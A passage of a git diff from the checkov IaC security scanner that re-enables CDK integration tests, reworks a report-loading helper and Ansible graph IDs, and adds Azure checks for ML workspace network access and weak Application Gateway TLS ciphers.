check_id="CKV_AWS_36", policy_name="CloudTrailLogValidation", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_20_S3PublicACLRead(): +def test_CKV_AWS_20_S3PublicACLRead(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_20", policy_name="S3PublicACLRead", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_56_S3RestrictPublicBuckets(): - run_check(check_results=failed_checks, check_id="CKV_AWS_56", policy_name="S3RestrictPublicBuckets", language="typescript") +def test_CKV_AWS_56_S3RestrictPublicBuckets(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_56", policy_name="S3RestrictPublicBuckets", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_149_SecretManagerSecretEncrypted(): - run_check(check_results=failed_checks, check_id="CKV_AWS_149", policy_name="S3RestrictPublicBuckets", language="typescript") +def test_CKV_AWS_149_SecretManagerSecretEncrypted(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_149", policy_name="SecretManagerSecretEncrypted", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_23_SecurityGroupRuleDescription(): - run_check(check_results=failed_checks, check_id="CKV_AWS_23", policy_name="SecurityGroupRuleDescription", language="typescript") +def test_CKV_AWS_23_SecurityGroupRuleDescription(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_23", policy_name="SecurityGroupRuleDescription", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_26_SNSTopicEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_26", policy_name="SNSTopicEncryption", language="typescript") +def test_CKV_AWS_26_SNSTopicEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_26", policy_name="SNSTopicEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_27_SQSQueueEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_27", policy_name="SQSQueueEncryption", language="typescript") +def test_CKV_AWS_27_SQSQueueEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_27", policy_name="SQSQueueEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_164_TransferServerIsPublic(): - run_check(check_results=failed_checks, check_id="CKV_AWS_164", policy_name="TransferServerIsPublic", language="typescript") +def test_CKV_AWS_164_TransferServerIsPublic(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_164", policy_name="TransferServerIsPublic", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_123_VPCEndpointAcceptanceConfigured(): - run_check(check_results=failed_checks, check_id="CKV_AWS_123", policy_name="VPCEndpointAcceptanceConfigured", language="typescript") +def test_CKV_AWS_123_VPCEndpointAcceptanceConfigured(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_123", policy_name="VPCEndpointAcceptanceConfigured", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_68_WAFEnabled(): +def test_CKV_AWS_68_WAFEnabled(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_68", policy_name="WAFEnabled", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_156_WorkspaceRootVolumeEncrypted(): - run_check(check_results=failed_checks, check_id="CKV_AWS_156", policy_name="WorkspaceRootVolumeEncrypted", language="typescript") +def test_CKV_AWS_156_WorkspaceRootVolumeEncrypted(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_156", policy_name="WorkspaceRootVolumeEncrypted", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_155_WorkspaceUserVolumeEncrypted(): - run_check(check_results=failed_checks, check_id="CKV_AWS_155", policy_name="WorkspaceUserVolumeEncrypted", language="typescript") +def test_CKV_AWS_155_WorkspaceUserVolumeEncrypted(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_155", policy_name="WorkspaceUserVolumeEncrypted", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_88_EC2PublicIP(): +def test_CKV_AWS_88_EC2PublicIP(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_88", policy_name="EC2PublicIP", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_163_ECRImageScanning(): +def test_CKV_AWS_163_ECRImageScanning(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_163", policy_name="ECRImageScanning", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_51_ECRImmutableTags(): +def test_CKV_AWS_51_ECRImmutableTags(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_51", policy_name="ECRImmutableTags", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_136_ECRRepositoryEncrypted(): +def test_CKV_AWS_136_ECRRepositoryEncrypted(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_136", policy_name="ECRRepositoryEncrypted", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_65_ECSClusterContainerInsights(): +def test_CKV_AWS_65_ECSClusterContainerInsights(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_65", policy_name="ECSClusterContainerInsights", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_97_ECSTaskDefinitionEFSVolumeEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_97", policy_name="ECSClusterContainerInsights", +def test_CKV_AWS_97_ECSTaskDefinitionEFSVolumeEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_97", policy_name="ECSTaskDefinitionEFSVolumeEncryption", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_42_EFSEncryptionEnabled(): +def test_CKV_AWS_42_EFSEncryptionEnabled(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_42", policy_name="EFSEncryptionEnabled", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_58_EKSSecretsEncryption(): +def test_CKV_AWS_58_EKSSecretsEncryption(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_58", policy_name="EKSSecretsEncryption", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_29_ElasticacheReplicationGroupEncryptionAtRest(): +def test_CKV_AWS_29_ElasticacheReplicationGroupEncryptionAtRest(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_29", policy_name="ElasticacheReplicationGroupEncryptionAtRest", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_30_ElasticacheReplicationGroupEncryptionAtTransit(): +def test_CKV_AWS_30_ElasticacheReplicationGroupEncryptionAtTransit(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_30", policy_name="ElasticacheReplicationGroupEncryptionAtTransit", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_31_ElasticacheReplicationGroupEncryptionAtTransitAuthToken(): +def test_CKV_AWS_31_ElasticacheReplicationGroupEncryptionAtTransitAuthToken(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_31", policy_name="ElasticacheReplicationGroupEncryptionAtTransitAuthToken", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_83_ElasticsearchDomainEnforceHTTPS(): +def test_CKV_AWS_83_ElasticsearchDomainEnforceHTTPS(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_83", policy_name="ElasticsearchDomainEnforceHTTPS", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_84_ElasticsearchDomainLogging(): +def test_CKV_AWS_84_ElasticsearchDomainLogging(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_84", policy_name="ElasticsearchDomainLogging", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_91_ELBAccessLogs(): - run_check(check_results=failed_checks, check_id="CKV_AWS_91", policy_name="ELBAccessLogs", language="typescript") +def test_CKV_AWS_92_ELBAccessLogs(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_92", policy_name="ELBAccessLogs", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_92_ELBv2AccessLogs(): - run_check(check_results=failed_checks, check_id="CKV_AWS_92", policy_name="ELBv2AccessLogs", language="typescript") +def test_CKV_AWS_91_ELBv2AccessLogs(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_91", policy_name="ELBv2AccessLogs", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_158_CloudWatchLogGroupKMSKey(): - run_check(check_results=failed_checks, check_id="CKV_AWS_158", policy_name="CloudWatchLogGroupKMSKey", language="typescript") +def test_CKV_AWS_158_CloudWatchLogGroupKMSKey(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_158", policy_name="CloudWatchLogGroupKMSKey", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_66_CloudWatchLogGroupRetention(): - run_check(check_results=failed_checks, check_id="CKV_AWS_66", policy_name="CloudWatchLogGroupRetention", language="typescript") +def test_CKV_AWS_66_CloudWatchLogGroupRetention(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_66", policy_name="CloudWatchLogGroupRetention", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_34_CloudfrontDistributionEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_34", policy_name="CloudfrontDistributionEncryption", language="typescript") +def test_CKV_AWS_34_CloudfrontDistributionEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_34", policy_name="CloudfrontDistributionEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_86_CloudfrontDistributionLogging(): - run_check(check_results=failed_checks, check_id="CKV_AWS_86", policy_name="CloudfrontDistributionLogging", language="typescript") +def test_CKV_AWS_86_CloudfrontDistributionLogging(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_86", policy_name="CloudfrontDistributionLogging", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_35_CloudtrailEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_35", policy_name="CloudtrailEncryption", language="typescript") +def test_CKV_AWS_35_CloudtrailEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_35", policy_name="CloudtrailEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_67_CloudtrailMultiRegion(): - run_check(check_results=failed_checks, check_id="CKV_AWS_67", policy_name="CloudtrailMultiRegion", language="typescript") +def test_CKV_AWS_67_CloudtrailMultiRegion(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_67", policy_name="CloudtrailMultiRegion", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_78_CodeBuildProjectEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_78", policy_name="CodeBuildProjectEncryption", language="typescript") +def test_CKV_AWS_78_CodeBuildProjectEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_78", policy_name="CodeBuildProjectEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_47_DAXEncryption(): +def test_CKV_AWS_47_DAXEncryption(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_47", policy_name="DAXEncryption", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_89_DMSReplicationInstancePubliclyAccessible(): - run_check(check_results=failed_checks, check_id="CKV_AWS_89", policy_name="DMSReplicationInstancePubliclyAccessible", language="typescript") +def test_CKV_AWS_89_DMSReplicationInstancePubliclyAccessible(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_89", + policy_name="DMSReplicationInstancePubliclyAccessible", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_104_DocDBAuditLogs(): +def test_CKV_AWS_104_DocDBAuditLogs(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_104", policy_name="DocDBAuditLogs", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_74_DocDBEncryption(): +def test_CKV_AWS_74_DocDBEncryption(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_74", policy_name="DocDBEncryption", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_90_DocDBTLS(): +def test_CKV_AWS_90_DocDBTLS(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_90", policy_name="DocDBTLS", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_165_DynamodbGlobalTableRecovery(): - run_check(check_results=failed_checks, check_id="CKV_AWS_165", policy_name="DynamodbGlobalTableRecovery", language="typescript") +def test_CKV_AWS_165_DynamodbGlobalTableRecovery(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_165", policy_name="DynamodbGlobalTableRecovery", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_28_DynamodbRecovery(): +def test_CKV_AWS_28_DynamodbRecovery(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_28", policy_name="DynamodbRecovery", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_3_EBSEncryption(): +def test_CKV_AWS_3_EBSEncryption(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_3", policy_name="EBSEncryption", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_5_ElasticsearchEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_5", policy_name="ElasticsearchEncryption", language="typescript") +def CKV_AWS_377_S3BucketLogging(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_377", policy_name="S3BucketLogging", + language="typescript") + + +def CKV_AWS_375_S3BucketEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_375", policy_name="S3BucketEncryption", + language="typescript") + + +def CKV_AWS_379_S3BucketVersioning(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_379", policy_name="S3BucketVersioning", + language="typescript") + + +def CKV_AWS_376_S3BucketKMSEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_376", policy_name="S3BucketKMSEncryption", + language="typescript") + + +def CKV_AWS_378_S3BucketPublicAccessBlock(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_378", policy_name="S3BucketPublicAccessBlock", + language="typescript") + + +def test_CKV_AWS_195_GlueSecurityConfigurationEnabled(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_195", policy_name="GlueSecurityConfigurationEnabled", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_6_ElasticsearchNodeToNodeEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_6", policy_name="ElasticsearchNodeToNodeEncryption", language="typescript") +def CKV_AWS_5_ElasticsearchEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_5", policy_name="ElasticsearchEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_94_GlueDataCatalogEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_94", policy_name="GlueDataCatalogEncryption", language="typescript") +def CKV_AWS_6_ElasticsearchNodeToNodeEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_6", policy_name="ElasticsearchNodeToNodeEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_99_GlueSecurityConfiguration(): - run_check(check_results=failed_checks, check_id="CKV_AWS_99", policy_name="GlueSecurityConfiguration", language="typescript") +def CKV_AWS_94_GlueDataCatalogEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_94", policy_name="GlueDataCatalogEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_195_GlueSecurityConfigurationEnabled(): - run_check(check_results=failed_checks, check_id="CKV_AWS_195", policy_name="GlueSecurityConfigurationEnabled", language="typescript") +def CKV_AWS_99_GlueSecurityConfiguration(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_99", policy_name="GlueSecurityConfiguration", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_40_IAMPolicyAttachedToGroupOrRoles(): - run_check(check_results=failed_checks, check_id="CKV_AWS_40", policy_name="IAMPolicyAttachedToGroupOrRoles", language="typescript") +def CKV_AWS_195_GlueSecurityConfigurationEnabled(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_195", policy_name="GlueSecurityConfigurationEnabled", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_43_KinesisStreamEncryptionType(): - run_check(check_results=failed_checks, check_id="CKV_AWS_43", policy_name="KinesisStreamEncryptionType", language="typescript") +def CKV_AWS_40_IAMPolicyAttachedToGroupOrRoles(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_40", policy_name="IAMPolicyAttachedToGroupOrRoles", + language="typescript") + +def CKV_AWS_43_KinesisStreamEncryptionType(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_43", policy_name="KinesisStreamEncryptionType", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_116_LambdaDLQConfigured(): - run_check(check_results=failed_checks, check_id="CKV_AWS_116", policy_name="LambdaDLQConfigured", language="typescript") + +def CKV_AWS_116_LambdaDLQConfigured(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_116", policy_name="LambdaDLQConfigured", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_45_LambdaEnvironmentCredentials(): - run_check(check_results=failed_checks, check_id="CKV_AWS_45", policy_name="LambdaEnvironmentCredentials", language="typescript") +def CKV_AWS_45_LambdaEnvironmentCredentials(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_45", policy_name="LambdaEnvironmentCredentials", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_173_LambdaEnvironmentEncryptionSettings(): - run_check(check_results=failed_checks, check_id="CKV_AWS_173", policy_name="LambdaEnvironmentEncryptionSettings", language="typescript") +def CKV_AWS_173_LambdaEnvironmentEncryptionSettings(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_173", policy_name="LambdaEnvironmentEncryptionSettings", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_115_LambdaFunctionLevelConcurrentExecutionLimit(): - run_check(check_results=failed_checks, check_id="CKV_AWS_115", policy_name="LambdaFunctionLevelConcurrentExecutionLimit", language="typescript") +def CKV_AWS_115_LambdaFunctionLevelConcurrentExecutionLimit(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_115", + policy_name="LambdaFunctionLevelConcurrentExecutionLimit", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_117_LambdaInVPC(): +def CKV_AWS_117_LambdaInVPC(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_117", policy_name="LambdaInVPC", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_8_LaunchConfigurationEBSEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_8", policy_name="LaunchConfigurationEBSEncryption", language="typescript") +def CKV_AWS_8_LaunchConfigurationEBSEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_8", policy_name="LaunchConfigurationEBSEncryption", + language="typescript") + +def CKV_AWS_44_NeptuneClusterStorageEncrypted(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_44", policy_name="NeptuneClusterStorageEncrypted", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_44_NeptuneClusterStorageEncrypted(): - run_check(check_results=failed_checks, check_id="CKV_AWS_44", policy_name="NeptuneClusterStorageEncrypted", language="typescript") +def CKV_AWS_118_RDSEnhancedMonitorEnabled(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_118", policy_name="RDSEnhancedMonitorEnabled", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def CKV_AWS_118_RDSEnhancedMonitorEnabled(): - run_check(check_results=failed_checks, check_id="CKV_AWS_118", policy_name="RDSEnhancedMonitorEnabled", language="typescript") + +def CKV_AWS_366_RDSMultiAZEnabled(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_366", policy_name="RDSMultiAZEnabled", + language="typescript") + + +def CKV_AWS_367_RDSPubliclyAccessible(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_367", policy_name="RDSPubliclyAccessible", + language="typescript") + + +def CKV_AWS_369_RedShiftSSL(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_369", policy_name="RedShiftSSL", + language="typescript") + + +def CKV_AWS_368_RedshiftClusterEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_368", policy_name="RedshiftClusterEncryption", + language="typescript") + + +def CKV_AWS_370_RedshiftClusterLogging(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_370", policy_name="RedshiftClusterLogging", + language="typescript") + + +def CKV_AWS_371_RedshiftClusterPubliclyAccessible(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_371", policy_name="RedshiftClusterPubliclyAccessible", + language="typescript") + + +def CKV_AWS_372_RedshiftInEc2ClassicMode(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_372", policy_name="RedshiftInEc2ClassicMode", + language="typescript") + + +def CKV_AWS_373_S3BlockPublicACLs(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_373", policy_name="S3BlockPublicACLs", + language="typescript") + + +def CKV_AWS_374_S3BlockPublicPolicy(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_374", policy_name="S3BlockPublicPolicy", + language="typescript") diff --git a/cdk_integration_tests/utils.py b/cdk_integration_tests/utils.py index 666b7e8f121..ce76b44c669 100644 --- a/cdk_integration_tests/utils.py +++ b/cdk_integration_tests/utils.py @@ -3,30 +3,34 @@ from typing import List, Dict, Any import yaml + current_dir = os.path.dirname(os.path.realpath(__file__)) def load_failed_checks_from_file(lang: str) -> Dict[str, List[Dict[str, Any]]]: - report_path = os.path.join(current_dir, '..', f'checkov_report_cdk_{lang}.json') + report_path = os.path.join(current_dir, '..', 'checkov_report_cdk.json') with open(report_path) as f: data = f.read() - report = json.loads(data) - assert report is not None - results = report.get("results", {}) - failed_checks = results.get("failed_checks") - skipped_checks = results.get("skipped_checks") - results = {} - for check in failed_checks: - check_id = check['check_id'] - if not results.get(check_id): - results[check_id] = [] - results[check_id].append(check) - for check in skipped_checks: - check_id = check['check_id'] - if not results.get(check_id): - results[check_id] = [] - results[check_id].append(check) - return results + reports = json.loads(data) + for report in reports: + if report.get('check_type') == f'cdk_{lang}': + assert report is not None + results = report.get("results", {}) + failed_checks = results.get("failed_checks") + skipped_checks = results.get("skipped_checks") + results = {} + for check in failed_checks: + check_id = check['check_id'] + if not results.get(check_id): + results[check_id] = [] + results[check_id].append(check) + for check in skipped_checks: + check_id = check['check_id'] + if not results.get(check_id): + results[check_id] = [] + results[check_id].append(check) + return results + return {} def is_policy_with_correct_check_id(check_id: str, language: str, policy_name: str) -> bool: diff --git a/checkov/ansible/graph_builder/local_graph.py b/checkov/ansible/graph_builder/local_graph.py index b9cb799c659..a94f9ca182d 100644 --- a/checkov/ansible/graph_builder/local_graph.py +++ b/checkov/ansible/graph_builder/local_graph.py @@ -69,7 +69,7 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") -> # either it is actually not an Ansible file or a playbook without tasks refs continue - resource_type = f"{ResourceType.TASKS}.{name}" + resource_type = f"{ResourceType.TASKS}.{prefix}{name}" if isinstance(config, str): # this happens when modules have no parameters and are directly used with the user input @@ -94,11 +94,11 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") -> self.vertices.append( Block( name=f"{resource_type}.{task_name}", - config=config, + config=task, path=file_path, block_type=BlockType.RESOURCE, attributes=attributes, - id=f"{resource_type}.{prefix}{task_name}", + id=f"{resource_type}.{task_name}", source=self.source, ) ) diff --git a/checkov/ansible/runner.py b/checkov/ansible/runner.py index f6ade71e9bb..8c0bd86c7be 100644 --- a/checkov/ansible/runner.py +++ b/checkov/ansible/runner.py @@ -2,6 +2,8 @@ from typing import TYPE_CHECKING, Any +from checkov.common.graph.checks_infra.registry import BaseRegistry + from checkov.ansible.checks.registry import registry from checkov.ansible.graph_builder.graph_components.resource_types import ResourceType from checkov.ansible.graph_builder.local_graph import AnsibleLocalGraph @@ -27,6 +29,7 @@ def __init__( source: str = "Ansible", graph_class: type[ObjectLocalGraph] = AnsibleLocalGraph, graph_manager: ObjectGraphManager | None = None, + external_registries: list[BaseRegistry] | None = None, ) -> None: super().__init__( db_connector=db_connector, @@ -128,3 +131,6 @@ def build_definitions_context( definitions_raw: dict[str, list[tuple[int, str]]], ) -> dict[str, dict[str, Any]]: return build_definitions_context(definitions=definitions, definitions_raw=definitions_raw) + + def set_definitions_raw(self, definitions_raw: dict[str, list[tuple[int, str]]]) -> None: + self.definitions_raw = definitions_raw diff --git a/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml b/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml new file mode 100644 index 00000000000..cfaaf45376c --- /dev/null +++ b/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml @@ -0,0 +1,15 @@ +metadata: + id: "CKV2_AZURE_49" + name: "Ensure that Azure Machine learning workspace is not configured with overly permissive network access" + category: "NETWORKING" +definition: + or: + - cond_type: "attribute" + resource_types: "Microsoft.MachineLearningServices/workspaces" + attribute: "properties.publicNetworkAccess" + operator: "not_exists" + - cond_type: "attribute" + resource_types: "Microsoft.MachineLearningServices/workspaces" + attribute: "properties.publicNetworkAccess" + operator: "equals" + value: "Disabled" \ No newline at end of file diff --git a/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py b/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py new file mode 100644 index 00000000000..a8003bb59d8 --- /dev/null +++ b/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py @@ -0,0 +1,71 @@ +from __future__ import annotations +from typing import Any +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_check import BaseResourceCheck + +BAD_CIPHERS = { + "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384", + "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256", + "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", + "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA", + "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384", + "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256", + "TLS_DHE_RSA_WITH_AES_256_CBC_SHA", + "TLS_DHE_RSA_WITH_AES_128_CBC_SHA", + "TLS_RSA_WITH_AES_256_GCM_SHA384", + "TLS_RSA_WITH_AES_128_GCM_SHA256", + "TLS_RSA_WITH_AES_256_CBC_SHA256", + "TLS_RSA_WITH_AES_128_CBC_SHA256", + "TLS_RSA_WITH_AES_256_CBC_SHA", + "TLS_RSA_WITH_AES_128_CBC_SHA", + "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 ", + "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256", + "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA", + "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA", + "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256", + "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 ", + "TLS_DHE_DSS_WITH_AES_256_CBC_SHA", + "TLS_DHE_DSS_WITH_AES_128_CBC_SHA", + "TLS_RSA_WITH_3DES_EDE_CBC_SHA", + "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA", +} +PROTOCOL_VERSIONS = {"TLSv1_2", "TLSv1_3"} + + +class AppGWDefinesSecureProtocols(BaseResourceCheck): + def __init__(self) -> None: + """ + https://azure.github.io/PSRule.Rules.Azure/en/rules/Azure.AppGw.SSLPolicy/ + """ + name = "Ensure Application Gateway defines secure protocols for in transit communication" + id = "CKV_AZURE_218" + supported_resources = ("Microsoft.Network/applicationGateways",) + categories = (CheckCategories.ENCRYPTION,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources,) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + sslPolicy = conf["properties"].get("sslPolicy") + if sslPolicy and isinstance(sslPolicy, dict): + policyType = sslPolicy.get("policyType") + if policyType != "Predefined": + protocolversion = sslPolicy.get("minProtocolVersion") + if ( + protocolversion and isinstance(protocolversion, str) + and protocolversion in PROTOCOL_VERSIONS + ): + ciphers = sslPolicy.get("cipherSuites") + if ciphers and isinstance(ciphers, list) and any(cipher in BAD_CIPHERS for cipher in ciphers): + return CheckResult.FAILED + return CheckResult.PASSED + + policyName = sslPolicy.get("policyName") + if policyName == "AppGwSslPolicy20220101S": + return CheckResult.PASSED + return CheckResult.FAILED + return CheckResult.FAILED + + +check = AppGWDefinesSecureProtocols() diff --git a/checkov/arm/checks/resource/AppServiceDisallowCORS.py b/checkov/arm/checks/resource/AppServiceDisallowCORS.py new file mode 100644 index 00000000000..1a38ca3b287 --- /dev/null +++ b/checkov/arm/checks/resource/AppServiceDisallowCORS.py @@ -0,0 +1,28 @@ +from typing import Any, List + +from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck +from checkov.common.models.enums import CheckCategories, CheckResult + + +class 